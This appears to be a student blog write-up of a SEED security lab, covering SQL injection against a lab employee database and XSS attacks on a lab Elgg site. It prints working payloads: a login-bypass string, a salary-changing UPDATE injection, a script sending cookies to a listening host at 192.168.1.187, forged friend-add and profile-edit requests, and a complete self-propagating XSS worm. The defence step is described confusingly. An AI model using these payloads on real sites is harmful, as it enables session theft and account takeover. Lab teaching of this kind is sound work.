20212916 2021-2022-2《网络攻防实践》实践十

1.实验内容

实践内容

一、SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序,并将其托管在www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:

熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。

对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。

对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

SQL对抗:修复上述SQL注入攻击漏洞。

二、SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。

发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。

弹窗显示cookie信息:将cookie信息显示。

窃取受害者的cookies:将cookie发送给攻击者。

成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。

修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。

编写XSS蠕虫。

对抗XSS攻击。

2.实验步骤

2.1 sql注入实验

本次实验在Ubuntu下进行

首先使用命令登录mysql :mysql -u root -p 此次登陆需要密码,密码为seedubuntu 输入正确密码后显示如下的界面

clip_image002

通过命令:show databases;查看mysql中的数据,显示查看到的数据如下图所示。

clip_image004

使用命令:use Users; 选择Users这张表

clip_image006

根据上一个命令结果的提示 输入命令:use Users; 选择Users这张表,具体显示如下图所示。

clip_image008

接着输入命令:show tables;查看这张表

clip_image010

下面选择这张表中的数据:select * from credential;

clip_image012

输入命令:select * from credential where Name='Alice'; 查询ALICE的所有信息

clip_image014

输入命令vim /var/www/SQLInjection/unsafe_home.php查看源代码,直接将密码和名字加入到了字符串当中,所有如果写Admin' #,#代表注释,所以会只能查询到ID查不到密码。注意输入此命令需要重新打开一个终端,因为者不是在mysql下的命令了。否则不会出来结果。

clip_image016

打开浏览器,输入网址会弹出一个登陆界面,在用户名界面中输入admin' #,

clip_image018

直接点击登陆之后发现Admin的salary

clip_image020

先输入:cd /var/www/SQLInjection/然后输入命令:

vim unsafe_edit_backend.php发现在UPDATE中直接填入了nickname所以只需要在网页端输入', Salary='987' where name='Admin'; #,就会将名字后部分作为注释

clip_image022

重新输入网址sqlinjection.com/unsafe_edit_frontend.php 进入以下的登陆界面,然后再用户名中输入字符串Salary='987' where name='Admin'; #

clip_image024

点击执行发现Admin的Salary变为了987。

clip_image026

2.2 XSS实验

输入图示的网址进入登陆页面,账号为Alice,密码为seedalice

clip_image028

进入之后点击编辑界面,再beief description输入

<script>alert("XSS");</script>

clip_image030

点击保存后弹出窗口,证明XSS攻击成功

clip_image032

2.3 查看cookie信息

还是进入编辑界面,再进入之后点击编辑界面,再beief description一栏中输入<script>alert(document.cookie);</script>

clip_image034

点击保存后弹出如下界面

clip_image036

开启监听查看返回的值

clip_image038

再次到编辑界面的beief description界面输入命令返回cookie,命令为<script>document.write('<img src=http://192.168.1.187:5555?c='+escape(document.cookie) + ' >');</script>,

注意这里的IP地址是Ubuntu的IP地址

clip_image040

点击保存,查看终端之后就可以看见监听的数据了

clip_image042

2.4 点击主页添加好友

打开火狐浏览器,添加HTTP HEADER 网址为:

clip_image044

回到之前界面,打开header,搜索好友

clip_image046

添加好友,查看拦截到的信息

clip_image048

保存文件后打开,可以看见第一个是朋友的ID 第二个是时间,第三个是身份认证

clip_image050

写下一串代码:

<script type="text/javascript">

window.onload = function () {

var Ajax=null;

var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;

var token="&__elgg_token="+elgg.security.token.__elgg_token;

//Construct the HTTP request to add Samy as a friend.

var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;

//Create and send Ajax request to add friend

Ajax=new XMLHttpRequest();

Ajax.open("GET",sendurl,true);

Ajax.setRequestHeader("Host","www.xsslabelgg.com");

Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

Ajax.send();

}

</script>

将代码粘贴到Alice的about me中

clip_image052

我们再次回到主页,没有发现任何的问题

clip_image054

接下来我们删除boby的好友,然后将账户切换到boby,同时也删除好友并刷新

clip_image056

先打开header,然后访问Alice的首页

clip_image058

之后再header界面发现一个数据包,说明仅仅是访问了alice的主页就向Alice发送了一个添加好友的请求,也就是说,恶意代码被执行了

clip_image060

这时我们发现刚刚删除的好友又被加了回来

clip_image062

2.5修改对方的about me

首先再Alice界面的about me界面随便输入字符并保存,然后查看header的监听内容。需要post来发送一个请求。

clip_image064

接下来根据这些信息来写代码进行攻击。

<script type="text/javascript">

window.onload = function(){

//JavaScript code to access user name, user guid, Time Stamp __elgg_ts

//and Security Token __elgg_token

var userName=elgg.session.user.name;

var guid="&guid="+elgg.session.user.guid;

var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;

var token="&__elgg_token="+elgg.security.token.__elgg_token;

var content=token+ts+"name="+userName+"&description=<p>This have been cracked by alice.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid;

var sendurl = "http://www.xsslabelgg.com/action/profile/edit";

var samyGuid=44;

if(elgg.session.user.guid!=samyGuid){

//Create and send Ajax request to modify profile

var Ajax=null;

Ajax=new XMLHttpRequest();

Ajax.open("POST",sendurl,true);

Ajax.setRequestHeader("Host","www.xsslabelgg.com");

Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

Ajax.send(content);

}

}

</script>

再Alice 账户内输入代码并保存

clip_image066

然后我们退出当前登陆并登陆boby的账号并访问Alice的首页信息。发现当前页面发出的一个请求。

clip_image068

然后打开boby的个人主页,发现其about me的页面已经被修改了。说明攻击成功了。

clip_image070

2.6 通过蠕虫传播攻击

登陆Alice的账号,删除上次的攻击内容,依旧在about me一栏中输入已经编写好的攻击代码。

<script id="worm" type="text/javascript">

window.onload = function(){

var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";

var jsCode = document.getElementById("worm").innerHTML;

var tailTag = "</" + "script>";

var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

var userName=elgg.session.user.name;

var guid="&guid="+elgg.session.user.guid;

var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;

var token="&__elgg_token="+elgg.security.token.__elgg_token;

//Construct the content of your url.

var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;

var sendurl = "http://www.xsslabelgg.com/action/profile/edit"

alert(content)

var samyGuid=44;

if(elgg.session.user.guid!=samyGuid)

{

var Ajax=null;

Ajax=new XMLHttpRequest();

Ajax.open("POST",sendurl,true);

Ajax.setRequestHeader("Host","www.xsslabelgg.com");

Ajax.setRequestHeader("Content-Type",

"application/x-www-form-urlencoded");

Ajax.send(content);

}

}

</script>

clip_image072

点击保存后弹出如下的界面,再点击ok即可。

clip_image074

退出当前账号,然后登陆boby的账号。发现boby的about me是完全空白的。clip_image076

将header的内容先清空,然后访问Alice的首页

弹出如下界面

clip_image078

发现代码已经被修改了进来

clip_image080

打开之后发现我们将discreaption设置为了下图的一串,也就是说代码已经进行了传播。

clip_image082

clip_image084

接下来换一个登陆账号,并让此账号访问boby的主页,看看是否攻击被传播了。这里发现即使是访问boby的主页,攻击依旧成功了。

clip_image086

2.7XXS对抗

登陆admin账号,密码为seedelg

clip_image088

选择plugins,点击HTMLawed,使它不可用

clip_image090

clip_image091

接下来我们登陆Alice,发现其about me中内容显示出来了,攻击失效了。

clip_image093

3.实验问题

问题一:修改about me之后攻击一直不成功

解决:是自己大意一直没有保存。

问题二:蠕虫实验的时候也是不成功,发现自己的about me修改的时候选择的模式不正确。

4.思考:

本次实验我了解了更加掩人耳目的攻击,仅仅是访问别人的主页就可以被攻击,确实很恐怖,这也让我明白以后不能随随便便添加陌生人为好友,也不能随随便便访问他人主页。

posted @ 2022-05-22 21:23  20212916  阅读(22)  评论(0编辑  收藏  举报